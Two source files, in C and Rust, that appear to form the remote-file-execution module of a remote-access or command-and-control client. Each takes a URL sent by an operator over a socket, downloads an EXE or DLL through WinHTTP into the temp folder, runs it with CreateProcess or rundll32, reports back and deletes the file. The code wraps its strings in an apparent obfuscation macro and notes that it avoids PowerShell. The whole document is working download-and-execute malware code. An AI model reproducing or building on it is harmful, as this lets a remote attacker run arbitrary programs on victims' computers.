File: client/src/rfe.c
#include "rfe.h"
#include <winhttp.h>
#include <stdio.h>

#pragma comment(lib, "winhttp.lib")

static void rfe_send(SOCKET sock, HANDLE mutex, const char* msg) {
    char* buf = malloc(strlen(msg) + 32);
    sprintf(buf, _S("[rfe_result]%s"), msg);
    sock_send(sock, mutex, buf);
    free(buf);
}

static int winhttp_download(const char* url, const char* dest_path) {
    wchar_t wurl[1024];
    MultiByteToWideChar(CP_UTF8, 0, url, -1, wurl, 1024);

    URL_COMPONENTS urlComp = { sizeof(urlComp) };
    urlComp.dwHostNameLength = (DWORD)-1;
    urlComp.dwUrlPathLength = (DWORD)-1;
    urlComp.dwExtraInfoLength = (DWORD)-1;

    if (!WinHttpCrackUrl(wurl, 0, 0, &urlComp)) return 0;

    wchar_t host[256];
    wcsncpy(host, urlComp.lpszHostName, urlComp.dwHostNameLength);
    host[urlComp.dwHostNameLength] = 0;

    HINTERNET hSession = WinHttpOpen(_S("client/1.0"), WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
    if (!hSession) return 0;
    HINTERNET hConnect = WinHttpConnect(hSession, host, urlComp.nPort, 0);
    if (!hConnect) { WinHttpCloseHandle(hSession); return 0; }

    DWORD flags = (urlComp.nScheme == INTERNET_SCHEME_HTTPS) ? WINHTTP_FLAG_SECURE : 0;
    HINTERNET hRequest = WinHttpOpenRequest(hConnect, _S("GET"), urlComp.lpszUrlPath, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, flags);
    if (!hRequest) { WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); return 0; }

    if (WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0) &&
        WinHttpReceiveResponse(hRequest, NULL)) {
        FILE* f = fopen(dest_path, _S("wb"));
        if (f) {
            DWORD size = 0;
            while (WinHttpQueryDataAvailable(hRequest, &size) && size > 0) {
                char* buf = malloc(size);
                DWORD read = 0;
                WinHttpReadData(hRequest, buf, size, &read);
                fwrite(buf, 1, read, f);
                free(buf);
            }
            fclose(f);
            WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession);
            return 1;
        }
    }
    WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession);
    return 0;
}

void handle_rfe_exe(SOCKET sock, HANDLE mutex, const char* payload) {
    char url[512], args[512];
    const char* sep = strchr(payload, '|');
    if (sep) {
        size_t url_len = sep - payload;
        if (url_len >= sizeof(url)) url_len = sizeof(url) - 1;
        strncpy(url, payload, url_len);
        url[url_len] = 0;
        strncpy(args, sep + 1, sizeof(args) - 1);
        args[sizeof(args) - 1] = 0;
    } else {
        strncpy(url, payload, sizeof(url) - 1);
        url[sizeof(url) - 1] = 0;
        args[0] = 0;
    }

    char tmp[MAX_PATH];
    GetTempPathA(MAX_PATH, tmp);
    strcat(tmp, _S("tmp_exe.exe"));

    if (!winhttp_download(url, tmp)) {
        rfe_send(sock, mutex, _S("error:Download failed"));
        return;
    }

    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    char cmd[1024];
    sprintf(cmd, _S("\"%s\" %s"), tmp, args);
    if (CreateProcessA(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        rfe_send(sock, mutex, _S("ok:Execution finished"));
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    } else {
        rfe_send(sock, mutex, _S("error:CreateProcess failed"));
    }
    DeleteFileA(tmp);
}

void handle_rfe_dll(SOCKET sock, HANDLE mutex, const char* url) {
    char tmp[MAX_PATH];
    GetTempPathA(MAX_PATH, tmp);
    strcat(tmp, _S("tmp_dll.dll"));

    if (!winhttp_download(url, tmp)) {
        rfe_send(sock, mutex, _S("error:Download failed"));
        return;
    }

    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    char cmd[1024];
    sprintf(cmd, _S("rundll32.exe \"%s\""), tmp);
    if (CreateProcessA(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        rfe_send(sock, mutex, _S("ok:rundll32 started"));
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    } else {
        rfe_send(sock, mutex, _S("error:rundll32 failed"));
    }
}

File: client/src/rfe.rs
// Remote File Execution — download via WinHTTP, run via CreateProcess
// No PowerShell, no reqwest.

use std::{env, fs, process::Command};
use crate::Sock;
use crate::send;

fn rfe_send(sock: &Sock, msg: &str) {
    send(sock, &format!("[rfe_result]{}", msg));
}

pub fn handle_exe(sock: &Sock, payload: &str) {
    let (url, args) = match payload.find('|') {
        Some(i) => (&payload[..i], payload[i + 1..].trim()),
        None    => (payload.trim(), ""),
    };

    let tmp = tmp_path("exe");
    if let Err(e) = winhttp_download(url, &tmp) {
        rfe_send(sock, &format!("error:Download failed: {}", e));
        return;
    }

    let mut cmd = Command::new(&tmp);
    if !args.is_empty() {
        cmd.args(args.split_whitespace());
    }

    match cmd.output() {
        Ok(o) => {
            let out = format!(
                "{}{}",
                String::from_utf8_lossy(&o.stdout),
                String::from_utf8_lossy(&o.stderr)
            );
            let out = out.trim();
            rfe_send(sock, &format!("ok:{}", if out.is_empty() { "(no output)" } else { out }));
        }
        Err(e) => rfe_send(sock, &format!("error:{}", e)),
    }

    let _ = fs::remove_file(&tmp);
}

pub fn handle_dll(sock: &Sock, url: &str) {
    let tmp = tmp_path("dll");
    if let Err(e) = winhttp_download(url, &tmp) {
        rfe_send(sock, &format!("error:Download failed: {}", e));
        return;
    }

    match Command::new("rundll32.exe").arg(&tmp).output() {
        Ok(o) => {
            let out = format!(
                "{}{}",
                String::from_utf8_lossy(&o.stdout),
                String::from_utf8_lossy(&o.stderr)
            );
            let out = out.trim();
            rfe_send(sock, &format!("ok:{}", if out.is_empty() { "(no output)" } else { out }));
        }
        Err(e) => rfe_send(sock, &format!("error:{}", e)),
    }

    let _ = fs::remove_file(&tmp);
}

fn tmp_path(ext: &str) -> String {
    use std::time::{SystemTime, UNIX_EPOCH};
    let nanos = SystemTime::now()
        .duration_since(UNIX_EPOCH)
        .unwrap_or_default()
        .subsec_nanos();
    let base = env::temp_dir();
    base.join(format!("~tmp{:x}.{}", nanos, ext))
        .to_string_lossy()
        .to_string()
}

/// Download `url` to `dest_path` using WinHTTP — no subprocess.
fn winhttp_download(url: &str, dest_path: &str) -> Result<(), String> {
    // Parse url into host + path (simple, handles http/https)
    let (use_ssl, rest) = if url.starts_with("https://") {
        (true, &url[8..])
    } else if url.starts_with("http://") {
        (false, &url[7..])
    } else {
        return Err("Unsupported scheme".to_string());
    };

    let (host, path) = match rest.find('/') {
        Some(i) => (&rest[..i], &rest[i..]),
        None    => (rest, "/"),
    };

    let port: u16 = if use_ssl { 443 } else { 80 };

    let body = winhttp_get(host, port, path, use_ssl)?;
    fs::write(dest_path, &body).map_err(|e| e.to_string())
}

fn winhttp_get(host: &str, port: u16, path: &str, use_ssl: bool) -> Result<Vec<u8>, String> {
    use windows::{
        core::PCWSTR,
        Win32::Networking::WinHttp::*,
    };
    unsafe {
        let agent:   Vec<u16> = "client\0".encode_utf16().collect();
        let host_w:  Vec<u16> = format!("{}\0", host).encode_utf16().collect();
        let path_w:  Vec<u16> = format!("{}\0", path).encode_utf16().collect();
        let verb_w:  Vec<u16> = "GET\0".encode_utf16().collect();

        let session = WinHttpOpen(
            PCWSTR(agent.as_ptr()),
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            PCWSTR::null(),
            PCWSTR::null(),
            0,
        );
        if session.is_null() {
            return Err("WinHttpOpen failed".to_string());
        }

        let connect = WinHttpConnect(session, PCWSTR(host_w.as_ptr()), port, 0);
        if connect.is_null() {
            WinHttpCloseHandle(session);
            return Err("WinHttpConnect failed".to_string());
        }

        let flags = if use_ssl { WINHTTP_FLAG_SECURE } else { WINHTTP_OPEN_REQUEST_FLAGS(0) };
        let request = WinHttpOpenRequest(
            connect,
            PCWSTR(verb_w.as_ptr()),
            PCWSTR(path_w.as_ptr()),
            PCWSTR::null(),
            PCWSTR::null(),
            std::ptr::null_mut(),
            flags,
        );
        if request.is_null() {
            WinHttpCloseHandle(connect);
            WinHttpCloseHandle(session);
            return Err("WinHttpOpenRequest failed".to_string());
        }

        let headers: Vec<u16> = Vec::new();
        WinHttpSendRequest(
            request,
            if headers.is_empty() { None } else { Some(&headers) },
            None,
            0,
            0,
            0,
        ).map_err(|e| format!("SendRequest: {}", e.message()))?;

        WinHttpReceiveResponse(request, std::ptr::null_mut())
            .map_err(|e| format!("ReceiveResponse: {}", e.message()))?;

        let mut body = Vec::new();
        loop {
            let mut available = 0u32;
            if WinHttpQueryDataAvailable(request, &mut available).is_err() || available == 0 {
                break;
            }
            let mut buf = vec![0u8; available as usize];
            let mut read = 0u32;
            if WinHttpReadData(request, buf.as_mut_ptr() as *mut _, available, &mut read).is_err() {
                break;
            }
            buf.truncate(read as usize);
            body.extend_from_slice(&buf);
        }

        WinHttpCloseHandle(request);
        WinHttpCloseHandle(connect);
        WinHttpCloseHandle(session);

        Ok(body)
    }
}